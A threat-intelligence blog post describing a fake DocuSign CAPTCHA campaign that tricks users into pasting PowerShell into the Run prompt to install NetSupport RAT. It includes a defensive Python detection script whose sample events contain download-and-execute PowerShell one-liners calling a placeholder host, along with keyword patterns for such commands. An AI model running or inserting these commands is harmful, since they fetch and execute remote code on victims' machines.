Fake Docusign Pages can Deliver Malware

Recently, I have been receiving emails from strangers that appeared to be from Docusign for my signature, now I know why.  A new malware campaign using fake DocuSign verification pages to deploy the NetSupport Remote Access Trojan (RAT) has been uncovered. According to DomainTools, the campaign tricks users into infecting their own machines through a series of deceptive steps involving clipboard manipulation and disguised scripts.  At the core of the campaign is a spoofed DocuSign website that mimics a CAPTCHA verification screen. Users are prompted to check a box, and that click triggers clipboard poisoning: a malicious PowerShell script is copied to the user's clipboard, with on-screen instructions to paste and run it via the Windows Run prompt.

Once executed, the script downloads a second-stage payload, which sets up persistence on the victim’s machine. This involves downloading an executable from GitHub and placing a shortcut in the Startup folder.  The final stage delivers NetSupport RAT, allowing the attacker to maintain remote access.  The initial script and site obfuscate their intent using ROT13 encoding and blend Cloudflare and DocuSign branding to appear legitimate.  Meanwhile, the attack’s architecture uses multiple steps to bypass security defenses, each script acting as a downloader for the next.

The DomainTools investigation also revealed a broader infrastructure supporting this campaign. Domains mimicking Gitcodes, Okta and popular media apps like Netflix and Spotify were identified.

The same techniques (CAPTCHA spoofing, script chaining and clipboard attacks) were found across these platforms.

Several domains shared common traits, including:

  • Registration via Cloudflare, NameCheap and NameSilo.
  • Name servers linked to cloudflare[.]com and luxhost[.]org.
  • SSL certificates issued by WE1.
  • Malware hosted on GitHub and Discord content delivery networks.

Despite the sophistication of the attack, the tools used are familiar.

These include NetSupport Manager, a legitimate remote administration tool, which is frequently repurposed in cyber-attacks. Similar techniques have been used by groups such as FIN7 and STORM-0408, though attribution remains unclear.  DomainTools urged users to stay alert, especially when prompted to run PowerShell scripts by unfamiliar websites. No legitimate site should ask users to paste commands into the Windows Run prompt under the pretense of verification. CAPTCHA pages that trigger script execution are also a clear warning sign.
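The Run-prompt chain described above leaves a recognisable trace in endpoint telemetry: a command typed into Win+R is started by explorer.exe, and in this campaign that command is a PowerShell download-and-execute one-liner, possibly ROT13-obfuscated. The following detection check is an added example written for this article (not DomainTools' or Red Sky Alliance's code); the process-creation events, the example.invalid URLs and the field names in the Sysmon-style records are all constructed for illustration.

```python
import codecs
import re

# Constructed Sysmon Event ID 1 style records (not real telemetry):
# two ClickFix-style launches from the Run prompt and one legitimate build script.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/stage2.txt | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     # ROT13-wrapped payload string, as the article describes for this campaign.
     "CommandLine": 'powershell -c "'
                    + codecs.encode("iex(iwr http://example.invalid/s.ps1)", "rot_13") + '"'},
    {"ParentImage": r"C:\Program Files\Microsoft VS Code\Code.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -NoProfile -File build.ps1"},
]

# Cues for "fetch something from the network and execute it" ...
DOWNLOAD_CUE = re.compile(
    r"\b(iwr|invoke-webrequest|downloadstring|downloadfile|iex|invoke-expression|curl|wget)\b",
    re.I)
# ... and for hiding the window or passing an encoded command.
HIDE_CUE = re.compile(r"-w(indowstyle)?\s+h(idden)?\b|-e(nc|ncodedcommand)?\b", re.I)


def classify(event):
    """Return the list of reasons an event looks like a pasted Run-prompt dropper."""
    reasons = []
    # Commands typed into Win+R are spawned by explorer.exe; a script started by a
    # scheduler, an IDE or a shell has a different parent.
    if (event["ParentImage"].lower().endswith("\\explorer.exe")
            and "powershell" in event["Image"].lower()):
        reasons.append("powershell launched from Explorer (Run prompt)")
    cmd = event["CommandLine"]
    # Scan the command line as-is and after a ROT13 pass, so a ROT13-wrapped
    # payload string still surfaces the same keywords.
    for label, text in (("plain", cmd), ("rot13", codecs.decode(cmd, "rot_13"))):
        if DOWNLOAD_CUE.search(text):
            reasons.append(f"download-and-execute cue ({label})")
        if HIDE_CUE.search(text):
            reasons.append(f"hidden/encoded switch ({label})")
    return reasons


def is_clickfix(event):
    """Alert when PowerShell comes from Explorer AND carries at least one payload cue."""
    reasons = classify(event)
    return any("Explorer" in r for r in reasons) and len(reasons) > 1
```

Run over real Sysmon or EDR process-creation events, the Explorer-parent condition is what separates a pasted Run-prompt command from the many legitimate PowerShell launches on a workstation; the ROT13 pass is specific to this campaign's obfuscation.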

Users should closely inspect URLs and SSL certificates, watching for subtle misspellings, strange domain extensions or unrecognized certificate issuers. These are often signs of spoofed websites.  DomainTools emphasized that these attacks rely more on user deception than technical flaws. Staying skeptical and verifying legitimacy before acting remains one of the strongest defenses. 

Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization.     For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or feedback@redskyalliance.com    

Weekly Cyber Intelligence Briefings:

REDSHORTS - Weekly Cyber Intelligence Briefings

https://attendee.gotowebinar.com/register/5504229295967742989

https://www.infosecurity-magazine.com/news/fake-docusign-pages-deliver-rat/